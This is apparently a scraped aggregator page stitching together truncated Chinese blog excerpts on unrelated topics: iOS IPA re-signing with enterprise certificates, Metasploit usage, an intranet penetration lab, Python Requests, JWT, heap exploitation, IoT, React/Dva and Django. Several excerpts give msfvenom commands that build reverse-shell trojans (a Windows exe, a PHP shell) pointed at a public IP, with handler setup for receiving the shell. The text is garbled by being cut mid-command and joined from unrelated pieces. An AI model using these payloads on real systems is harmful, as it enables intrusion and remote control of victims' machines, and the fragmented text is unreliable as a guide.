payload

ios 企业证书 ipa 重新签名发布

半城伤御伤魂 提交于 2020-01-10 09:16:45
提示:暂时不能用了,企业证书滥用 ios 企业证书 ipa 重新签名发布 1. 应用场景 当前有一个 未用企业证书签名的 ipa 文件,默认是不可以直接安装到设备上的;我们需要用企业版证书签名; 当前有一个已经用企业证书签名的 ipa 文件,不过我们可以用另外一个企业证书对其重新签名; 以上两种场景国内有开放的平台在做,比如 蒲公英 2. 重新签名原理和工具 Solution: Unzip the IPA unzip Application.ipa Remove old CodeSignature rm -r "Payload/Application.app/_CodeSignature" "Payload/Application.app/CodeResources" 2> /dev/null | true Replace embedded mobile provisioning profile cp "MyEnterprise.mobileprovision" "Payload/Application.app/embedded.mobileprovision" Re-sign /usr/bin/codesign -f -s "iPhone Distribution: Certificate Name" --resource-rules "Payload/Application

Msf的一些常用操作

南笙酒味 提交于 2020-01-10 05:00:49
payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe // -p < payload > -f < format> -o < path> = > 监听 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip set LPORT 8888 exploit -j PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php use exploit/multi/handler set PAYLOAD php/meterpreter_reverse_tcp set LHOST 172.17.150.246 set LPORT 8888 exploit -j shellcode: msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60

简单的内网渗透实验

孤街浪徒 提交于 2020-01-09 23:53:17
本机win10  192.168.1.109 虚拟机win7  NAT模式  192.168.1.131 攻击机:虚拟机kali  仅主机模式  192.168.10.128 假设攻击机kali已经对win10主机getshell 1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理) msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.128 lport=4444 -f exe -o test.exe 将test.exe上传到win10主机上 2.msf下使用反弹连接 msfconsole msf5 > use exploit/multi/handler 3.设置反弹需要的payload msf5 > set payload windows/x64/meterpreter/reverse_tcp 4.查看配置选项 msf5 > show options 5.设置反弹回来的我们自己的主机IP和端口,开始监听4444端口 msf5 > set lhost 192.168.10.128 msf5 > set lport 4444 msf5 > run 6.目标主机打开木马程序文件payload.exe,得到反弹shell meterpreter >

Requests文档 阅读笔记

女生的网名这么多〃 提交于 2020-01-09 02:04:44
Request库 Requests is an elegant and simple HTTP library for Python, built for human beings. Request库是日常中经常使用的库,总结一下吧。附上文档 Requests: 让 HTTP 服务人类 发送请求 #使用requests库前都要导入requests库 import requests #发送GET,POST,PUT,DELETE,HEAD 以及 OPTIONS 请求 r = requests.get('https://www.cnblogs.com/thenbz3/') r = requests.post('https://www.cnblogs.com/thenbz3/') r = requests.put('https://www.cnblogs.com/thenbz3/') r = requests.delete('https://www.cnblogs.com/thenbz3/') r = requests.head('https://www.cnblogs.com/thenbz3/') r = requests.options('https://www.cnblogs.com/thenbz3/') 传递URL参数 #GET请求时传递参数 payload = {'key1':

JWT简介

喜你入骨 提交于 2020-01-08 10:04:54
原文地址: https://jwt.io/introduction/ 什么是JSON Web Token? JSON Web Token(JWT)是一个开放标准( RFC 7519 ),它定义了一种紧凑且自包含的方式,用于在各程序之间以JSON对象方式安全地传输信息。 由于此信息是经过数字签名的,因此可以被验证和信任。 可以使用加密算法(使用 HMAC 算法)或使用 RSA 或 ECDSA 的公钥/私钥对对 JWT进行 签名 。 尽管JWTs可以被加密以在双方之间提供保密性,但我们将重点关注已 签名的 令牌。 签名的令牌可以验证其中 包含的claims 的 完整性 ,而加密的令牌则将 这些claims 隐藏了 。 当使用公钥/私钥对token进行签名时,签名还证明只有持有私钥的一方才是对其进行签名的一方。 什么时候应该使用JSON Web Token? 以下是JSON Web Token使用场景: Authorization(授权) :这是使用JWT最常见的场景。 一旦用户登录,后续的每一个请求将附带JWT,从而允许用户访问该token允许的路由,服务和资源。单点 登录是当今广泛使用JWT的一个特性,因为它的开销很小并且可以在不同的域中轻松使用。 信息交换 :JSON Web Token是在各程序之间安全地传输信息的好方法。 因为可以对JWT进行 Signature(例如,使用公钥

堆溢出-House of orange 学习笔记(看雪论坛)

邮差的信 提交于 2020-01-07 20:45:59
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 ( http://blog.leanote.com/simp1e ), 如果有错误的地方,请各位大牛多多指正。 0x00 程序描述 大名鼎鼎的house_of_orange程序逻辑还比较清晰的,一共可以build四次,然后每次build的话就是3次堆分配,两次malloc,一次calloc,其中一次malloc是固定分配0x10字节作为控制堆块,里面存放着name和color的信息,另外按输入分配name的大小。 0x01 程序漏洞 1. 堆溢出 在upgrade函数中,修改name时候不顾实际chunk的堆大小是多少,直接进行编辑,最大可编辑0x1000大小,因而存在溢出。 0x02 漏洞利用 这里的利用思路是4ngelboy给出,下面就直接分析这样利用的原因。 1. 信息泄露 (泄露libc地址) 因为程序中有堆的越界写,可以修改top_chunk的大小。在malloc源码里面如果申请的堆块大小超过了top_chunk的大小,将调用sysmalloc来进行分配

阿里云物联网平台设备历史属性上报及MNS服务端订阅

泪湿孤枕 提交于 2020-01-07 11:18:44
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 概述 阿里云物联网平台不仅支持设备即时属性的上报,也支持因为某些原因,没有及时上报的属性数据,通过历史属性上报的方式进行上报,历史属性上报Topic:/sys/{productKey}/{deviceName}/thing/event/property/history/post。本文结合物联网平台最新推出的独享实例,在新的实例下面创建产品及设备,进行历史属性的上报测试,并进行 MNS 历史属性服务端订阅。 操作步骤 1、创建独享实例,在独享实例下面创建产品和设备 2、获取独享实例设备端MQTT接入点 3、设备端接入,参考 链接 import com.alibaba.taro.AliyunIoTSignUtil; import org.eclipse.paho.client.mqttv3.*; import org.eclipse.paho.client.mqttv3.persist.MemoryPersistence; import java.util.HashMap; import java.util.Map; public class IoTDemoPubSubDemo { public static String productKey = "g028S******"; public static

React + Dva + Antd + Umi 概况

若如初见. 提交于 2020-01-07 02:51:17
前沿:学习了react框架之后,在此基础上,学习umi、dva框架,比较容易。 Dva 由阿里架构师 sorrycc 带领 team 完成的一套前端框架,在作者的 github 里是这么描述它的:”dva 是 react 和 redux 的最佳实践”。 Antd 是阿里的一套开箱即用的中台前端/设计解决方案,UI框架。 Umi 一套可插拔的企业级 react 应用框架,同样由dva作者 sorrycc 完成。他在Umi中引入了 UI 工具 antd,打包工具 roadhog,路由 react-router和状态管理器 dva,做到了可插拔机制。 Dva 初实践 一般来说,可以分为主要的三个部分, models 、 services 和 views 。其中, views 负责页面上的展示,这个不做赘述; services 里面主要写一些请求后台接口的方法; models 是其中最重要的概念,这里存放了各种数据,并对数据进行相应的交互。 view层 import React, { Component } from 'react'; import { Form, Input } from 'antd'; import { connect } from 'dva/index'; @Form.create() class View extends Component { render() {

Getting Response 404 while posting JSON payload to POST Rest API

烈酒焚心 提交于 2020-01-06 05:57:26
问题 I'm trying to post a JSON payload to a Public POST Rest API in MuleESB but I'm getting this error: org.mule.module.http.internal.request.ResponseValidatorException: Response code 404 mapped as failure. I'm able to call the API with JSON body via Postman Chrome App, but not via Postman Desktop App or MuleESB. I've Google-ing around in the past 2 days but still have no clue what I'm missing. Please enlighten me if you have a clue what caused this not to work. This is the JSON payload: {

django项目之配置jwt的token认证

雨燕双飞 提交于 2020-01-05 00:02:32
1. jwt简介 Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。 2. jwt构成 jwt就是一段字符串, 由三段信息构成的, 将这三段信息文本用. 链接在一起就构成了jwt字符串, 就像这样: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ 第一部分我们称它为头部(header), 第二部分我们称其为载荷(payload, 类似于飞机上承载的物品), 第三部分是签证(signature). header jwt的头部承载两部分信息: a. 声明类型, 这里是jwt b. 声明加密的算法,通常直接使用 HMAC SHA256 完整的头部就像下面这样的JSON: { 'typ':